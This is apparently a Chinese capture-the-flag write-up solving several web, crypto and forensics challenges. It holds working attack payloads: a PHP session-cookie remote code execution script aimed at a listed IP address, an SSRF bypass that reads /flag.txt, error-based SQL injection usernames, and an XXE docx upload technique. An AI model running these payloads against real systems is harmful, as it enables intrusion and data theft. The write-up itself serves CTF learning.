给了flag.en和rsa_private_key.pem私钥,直接用openssl解密,得到flag{We1c0meCtf3r_elab}
php的无参数rce,利用PHPSESSID,参考:https://xz.aliyun.com/t/6316#toc-8
脚本如下:
import requests
import binascii
payload = "system('cat /flag.txt');"
payload = str(binascii.b2a_hex(payload.encode('utf-8'))).strip("b").strip("'")
cookies={
"PHPSESSID": payload
}
r = requests.post('http://124.193.74.212:7905?var=eval(hex2bin(session_id(session_start())));', cookies=cookies)
print(r.content.decode("utf-8", "ignore"))
把index.php两次base64编码传入,可以返回源码的base64,里面有提示:hal0flagi5here.php
然后同样的方式读取该文件源码如下:
$argv[1]=$_GET['url'];
if(filter_var($argv[1],FILTER_VALIDATE_URL))
{
$r = parse_url($argv[1]);
print_r($r);
if(preg_match('/happyctf\.com$/',$r['host']))
{
$url=file_get_contents($argv[1]);
echo($url);
}else
{
echo("error");
}
}else
{
echo "403 Forbidden";
}
?>
然后参考前一段时间“高校战役”的一道SSRF题目,使用如下payload绕过:
url=compress.zlib://file:@happyctf.com/../../../flag.txt
几乎RCTF2015 easysql的原题,就改了个flag的位置,修改密码的地方存在二次注入,利用报错可以拿到数据。
注册如下用户名:
Lethe"||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e),1)#
Lethe"||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1)#
Lethe"||updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e),1)#
利用docx文件进行xxe,并且给了源码:
if(isset($_POST["submit"])) {
$target_file = getcwd()."/upload/".md5($_FILES["file"]["tmp_name"]);
if (move_uploaded_file($_FILES["file"]["tmp_name"], $target_file)) {
try {
$result = @file_get_contents("zip://".$target_file."#docProps/core.xml");
$xml = new SimpleXMLElement($result, LIBXML_NOENT);
$xml->registerXPathNamespace("dc", "http://purl.org/dc/elements/1.1/");
foreach($xml->xpath('//dc:title') as $title){
echo "Title '".$title . "' has been added.
";
}
} catch (Exception $e){
echo $e;
echo "上传文件不是一个docx文档.";
}
} else {
echo "上传失败.";
}
}
可以看到是从docProps目录下的core.xml读取xml,所以把docx文件解压后在core.xml里构造payload:
然后在压缩回docx文件:
上传该docx文件即可得到flag:
参考:https://blog.csdn.net/qq_29457453/article/details/104918136
脚本如下:
import libnum
import gmpy2
def gcd(a, b):
while b:
a, b = b, a % b
return a
def mapx(x):
x = (pow(x, n-1, n)+3) % n
return x
n = 33774167600199691072470424898842928168570559940362770786060699320989546851695106466924163816843729828399984649770900793014896037884774039660562546937090412844276185560384964983508291174867808082182386566813393157054259464108858158903739578119760394228341564696225513954400995543629624209942565369972555679980359992955514826589781286738100616149226885302403505062415492679633217275379153421830105021673417544608398249866398042786421630495968810854036782025120509999022773806069591080190166920079688217334968528641747739241234353918892029263544388161160427668518991666960251381106788899451912317001247537576428186291689
x1 = x2 = 1
while True:
x1 = mapx(x1)
x2 = mapx(mapx(x2))
p = gcd(x1-x2, n)
if (p != 1):
break
q = n // p
e = 65537
c = 0xcd979917f492a04b86057a070923bd0b9eae2f1b81c75bf5d8a8fba9fc2084c00f2a697b409578abebdabcf337382d09145630f4040b0c5ff411171e577f563c3cfb4e22639e0755f76be976f7d7e68f05f87f78f178079354b4cec2a5cbea443439420be0b850d1fb696c5dea420594ad957ba96216cdb9d8f1f316adac64bc6eac5150b02540e5232d68bb69dc04363e2115d9120af2fd1c9ff2cd7588880333608110d687b22170540861a6e2308714d54cdee5cd5d28a16e37732e44c2208251513196a63d17bd4f7a69c526c118eebfbb77cf25e5e419fef6c59c0a17132b538d945dab3553751278ef415559f2d5afc30146d277555545c4d192c5e1b4
phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(libnum.n2s(m))
先执行下面命令:
tshark -r u.pcapng -T fields -e usb.capdata > usbdata.txt
网上找到下面脚本:
#!/usr/bin/env python
# -*- coding:utf-8 -*-
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"" ,"29":"" ,"2a":"", "2b":"\t","2c":"" ,"2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"" ,"33":";","34":"'","35":"" ,"36":",","37":".","38":"/","39":"" ,"3a":"" ,"3b":"" , "3c":"" ,"3d":"" ,"3e":"" ,"3f":"" ,"40":"" ,"41":"" ,"42":"" ,"43":"" ,"44":"" ,"45":"" }
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"" ,"29":"" ,"2a":"", "2b":"\t","2c":"" ,"2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"" ,"33":"\"","34":":","35":"" ,"36":"<","37":">","38":"?","39":"" ,"3a":"" ,"3b":"" , "3c":"" ,"3d":"" ,"3e":"" ,"3f":"" ,"40":"" ,"41":"" ,"42":"" ,"43":"" ,"44":"" ,"45":"" }
output = []
keys = open('usbdata.txt')
for line in keys:
try:
if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
continue
if line[6:8] in normalKeys.keys():
output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
else:
output += ['[unknown]']
except:
pass
keys.close()
flag=0
print("".join(output))
for i in range(len(output)):
try:
a=output.index('')
del output[a]
del output[a-1]
except:
pass
for i in range(len(output)):
try:
if output[i]=="" :
flag+=1
output.pop(i)
if flag==2:
flag=0
if flag!=0:
output[i]=output[i].upper()
except:
pass
print ('output :' + "".join(output))
得到:
在vim中敲入对应的按键得到:
可能哪里敲错了(应该是honk和Of),得到压缩包的密码为:honkover1esOfNanle